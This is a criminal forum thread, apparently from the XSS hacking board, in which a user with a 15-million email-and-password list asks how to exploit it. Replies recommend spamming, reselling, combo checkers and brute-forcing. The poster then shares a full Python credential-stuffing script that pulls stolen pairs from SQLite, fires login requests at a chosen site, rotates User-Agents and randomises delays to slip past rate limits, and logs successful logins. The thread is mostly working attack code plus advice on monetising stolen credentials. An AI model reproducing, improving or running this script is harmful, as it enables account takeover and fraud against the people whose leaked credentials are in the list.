hello all i recently acquired a 15M email and password list, could do with some suggestions of whats best to do with the database. any help is good help, thanks
-
XSS.stack #1 – первый литературный журнал от юзеров форума
idea's for emails list?
- Автор темы honeybunz
- Дата начала
Use them for spam purposes or just sell them , they are most likely trash , if you obtained by hacking , then use checkers to find something good from it .
- Автор темы
- Добавить закладку
- #3
what checkers can i use?
check forums which are dedicated to cracking , so just these to find accounts and then resale the accounts.
you could put them in silver bullet with good proxies to get some accounts... or just sell it for those who do that
use it as an input for some automated brute-force tool. anyways, is it new or just some old shitty combolist?
- Автор темы
- Добавить закладку
- #7
couldnt find a automated brute-force tool, so start making my own lol. still a work in progress.
Python:
import re
import os
import time
import random
import sqlite3
import logging
import argparse
import requests
import configparser
import asyncio
import aiohttp
import aiosqlite
from zxcvbn import zxcvbn
from alive_progress import alive_bar
# User-Agent and Headers
DEFAULT_HEADERS = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Accept-Language": "en-US,en;q=0.9",
# Add any other necessary headers
}
# Logging Configuration
logging.basicConfig(
level=logging.INFO, format="[%(asctime)s] [%(levelname)s] %(message)s"
)
logger = logging.getLogger(__name__)
logger.addHandler(logging.FileHandler("brute_force.log"))
async def connect_to_database(database_file):
"""Connect to SQLite database and return the connection and cursor objects."""
try:
conn = await aiosqlite.connect(database_file)
cursor = await conn.cursor()
return conn, cursor
except sqlite3.Error as e:
logger.error(f"Failed to connect to the database: {str(e)}")
raise
async def retrieve_credentials(cursor):
"""Retrieve usernames and passwords from the database and return as a list of tuples."""
try:
await cursor.execute("SELECT email, password FROM email_combo")
return await cursor.fetchall()
except sqlite3.Error as e:
logger.error(f"Failed to retrieve credentials from the database: {str(e)}")
raise
async def login_attempt(target_url, username, password, headers):
"""Send a login request and return the response."""
login_data = {"username": username, "password": password}
try:
async with aiohttp.ClientSession(headers=headers) as session:
async with session.post(target_url, data=login_data) as response:
response.raise_for_status()
return await response.text()
except aiohttp.ClientError as e:
logger.error(f"An error occurred while sending the login request: {str(e)}")
raise
def handle_login_response(response, username, password):
"""Handle the login response and print appropriate messages."""
if "Login Successful" in response:
logger.info(f"Successful login! Username: {username}, Password: {password}")
return True
else:
logger.info(f"Failed login attempt. Username: {username}, Password: {password}")
return False
async def close_database_connection(conn):
"""Close the database connection."""
try:
await conn.close()
except sqlite3.Error as e:
logger.error(f"Failed to close the database connection: {str(e)}")
def generate_report(credentials, successful_logins):
"""Generate a detailed report after the brute-force attack completes."""
total_attempts = len(credentials)
failed_attempts = total_attempts - successful_logins
success_rate = (successful_logins / total_attempts) * 100
# Generate password strength analysis
password_analysis = []
for username, password in credentials:
result = zxcvbn(password)
score = result["score"]
password_analysis.append((username, password, score))
# Generate and save the report
report = f"Brute-force attack report:\n\n"
report += f"Total attempts: {total_attempts}\n"
report += f"Successful logins: {successful_logins}\n"
report += f"Failed attempts: {failed_attempts}\n"
report += f"Success rate: {success_rate:.2f}%\n\n"
report += f"Password strength analysis:\n"
for username, password, score in password_analysis:
report += f"Username: {username}, Password: {password}, Strength: {score}/4\n"
# Save the report to a file
report_filename = "brute_force_report.txt"
with open(report_filename, "w") as report_file:
report_file.write(report)
logger.info(f"Report generated and saved as {report_filename}")
async def perform_login(target_url, username, password, headers):
"""Perform a single login attempt and handle the response."""
try:
response = await login_attempt(target_url, username, password, headers)
return handle_login_response(response, username, password)
except (aiohttp.ClientError, sqlite3.Error) as e:
logger.error(f"An error occurred during login attempt: {str(e)}")
return False
def check_password_strength(password):
"""Check the strength of a password using zxcvbn."""
result = zxcvbn(password)
score = result["score"]
print(f"Password strength: {score}/4")
async def perform_login_brute_force(
target_url,
database_file,
delay_between_attempts,
headers,
max_workers,
min_delay,
max_delay,
max_errors,
user_agents,
):
"""Perform login brute force using credentials from the database."""
try:
conn, cursor = await connect_to_database(database_file)
credentials = await retrieve_credentials(cursor)
num_attempts = 0
num_successful = 0
consecutive_errors = 0
async with alive_bar(len(credentials), title="Brute-force Progress") as bar:
tasks = []
semaphore = asyncio.Semaphore(max_workers)
for username, password in credentials:
# Throttling and Rate Limiting
await asyncio.sleep(delay_between_attempts)
delay = random.uniform(min_delay, max_delay)
await asyncio.sleep(delay)
check_password_strength(password)
rotate_user_agent(headers, num_attempts, user_agents)
async with semaphore:
task = asyncio.create_task(
perform_login(target_url, username, password, headers)
)
tasks.append(task)
num_attempts += 1
update_progress(num_attempts, num_successful, len(credentials))
bar()
logger.info(f"Remaining attempts: {len(credentials) - num_attempts}")
await asyncio.gather(*tasks)
await close_database_connection(conn)
# Generate and save the report
generate_report(credentials, num_successful)
# Display progress and results summary
logger.info("Login brute force completed.")
logger.info(f"Total attempts: {num_attempts}")
logger.info(f"Successful logins: {num_successful}")
logger.info(f"Remaining attempts: {len(credentials) - num_attempts}")
except Exception as e:
handle_error(e)
# Rate limit
def handle_rate_limit(response, delay_between_attempts):
"""Handle rate limit by increasing the delay between attempts."""
if response.status_code == 429:
logger.warning("Rate limit exceeded. Increasing delay...")
delay_between_attempts *= 2
return delay_between_attempts
# User-Agent rotation
def rotate_user_agent(headers, num_attempts, user_agents):
"""Rotate the User-Agent header to try different user agents."""
user_agent = user_agents[num_attempts % len(user_agents)]
headers["User-Agent"] = user_agent
def read_config_file(config_file):
"""Read configuration from file and return a configparser.ConfigParser object."""
config = configparser.ConfigParser()
try:
config.read(config_file)
return config
except configparser.Error as e:
logger.error(f"Error reading configuration file: {str(e)}")
raise
def prompt_target_url(target_urls):
"""Prompt the user to choose a target URL."""
print("Do you want to use your own target URL or choose from the list?")
print("1. Use my own target URL")
print("2. Choose from the list")
choice = input("Enter the corresponding number: ").strip()
if choice == "1":
target_url = input("Enter your target URL: ").strip()
return target_url
elif choice == "2":
print("Select a target URL:")
for i, url in enumerate(target_urls):
print(f"{i + 1}. {url}")
choice = input("Enter the corresponding number: ").strip()
if choice:
index = int(choice) - 1
if 0 <= index < len(target_urls):
return target_urls[index]
return None
def handle_error(error):
"""Handle and log any errors that occur during the script execution."""
logger.error(f"An error occurred: {str(error)}")
def validate_target_url(target_url):
"""Validate the format of the target URL."""
# Perform your validation logic here
# Example: Check if the target URL is a valid URL
...
async def main():
parser = argparse.ArgumentParser(description="Login Brute Force Script")
parser.add_argument(
"-c",
"--config-file",
help="Configuration file containing additional settings",
)
args = parser.parse_args()
# Read configuration file if provided or use config.ini if not provided
config_file = args.config_file or "config.ini"
config = read_config_file(config_file)
# Get target URL from config or user input
target_urls = config.get("GENERAL", "target_urls", fallback="").split(",")
target_url = None
if target_urls:
target_url = prompt_target_url(target_urls)
if not target_url:
logger.error("Invalid target URL. Exiting...")
return
# Set up parameters from configuration file
database_file = config.get("GENERAL", "database_file", fallback="")
delay_between_attempts = config.getfloat(
"GENERAL", "delay_between_attempts", fallback=0
)
headers = (
dict(DEFAULT_HEADERS, **dict(config.items("headers")))
if config
else DEFAULT_HEADERS
)
max_workers = config.getint("GENERAL", "max_workers", fallback=10)
min_delay = config.getfloat("GENERAL", "min_delay", fallback=0)
max_delay = config.getfloat("GENERAL", "max_delay", fallback=1)
max_errors = config.getint("GENERAL", "max_errors", fallback=5)
user_agents = (
config.get("GENERAL", "user_agents", fallback="").split(",") if config else []
)
# Validate the target URL
validate_target_url(target_url)
# Perform login brute force
await perform_login_brute_force(
target_url,
database_file,
delay_between_attempts,
headers,
max_workers,
min_delay,
max_delay,
max_errors,
user_agents,
)
if __name__ == "__main__":
asyncio.run(main())You will find these tools on cracked[.]io